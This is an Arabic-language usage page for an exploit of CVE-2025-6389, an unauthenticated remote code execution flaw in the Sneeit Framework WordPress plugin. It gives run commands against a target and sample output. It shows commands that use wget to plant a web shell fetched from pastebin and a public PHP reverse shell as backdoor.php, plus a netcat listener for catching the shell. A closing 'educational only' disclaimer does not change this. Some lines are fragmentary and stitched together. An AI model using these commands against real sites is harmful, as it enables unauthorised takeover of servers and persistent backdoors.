
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 هي ثغرة حرجة (CVSS 9.8) في إطار Sneeit Framework لووردبريس (الإصدار 8.3 فما دون)، المستخدم على نطاق واسع في القوالب الشائعة. تسمح بـ تنفيذ أوامر عن بُعد بدون مصادقة — أخطر أنواع الثغرات على الويب.
# تثبيت التبعيات
pip3 install requests colorama
# فحص الثغرة + الحصول على شيل تفاعلي
python3 CVE-2025-6389.py https://target.com
# تنفيذ أمر واحد فقط
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die)استخدم هذا فقط على أهداف لديك تفويض رسمي لاختبارها (نطاق واضح + قواعد الاشتباك).
لا تزال الثغرة تُستغل بشكل مكثف في البرية الآن.
إليك بالضبط ما ستراه في الطرفية عندما يعمل الإكسبلويت فعليًا (استغلال ناجح بنسبة 100% لـ CVE-2025-6389 على هدف ضعيف يعمل بـ Sneeit Framework الإصدار 8.3 فما دون):
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (صفحة phpinfo() كاملة تستمر لآلاف الأسطر)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
ثم على جهازك الخاص:
nc -lvnp 4444
→ ستحصل فورًا على شيل عكسي تفاعلي كامل كـ www-data.
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(لا شيء / استجابة فارغة / استجابة AJAX عادية من ووردبريس / 403 / 500 بدون مخرجات)
تعرف أنه نجح عندما ترى أيًا من هذه:
هذا كل شيء. إذا حصلت على أي مما سبق → تم تحقيق RCE كاملة بدون مصادقة.
الصق مخرجاتك هنا إذا كنت تريد مني تأكيد 100% ما إذا نجحت أم لا.
sneeit_articles_pagination_callback()call_user_func() → تنفيذ تعليمات برمجية عشوائيةهذه المعلومات مقدمة لأغراض دفاعية وتعليمية فقط 🛡️. لا تستخدمها لاستغلال أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها 🚫. اتبع دائمًا الإرشادات القانونية والأخلاقية عند التعامل مع ثغرات الأمان ⚖️✨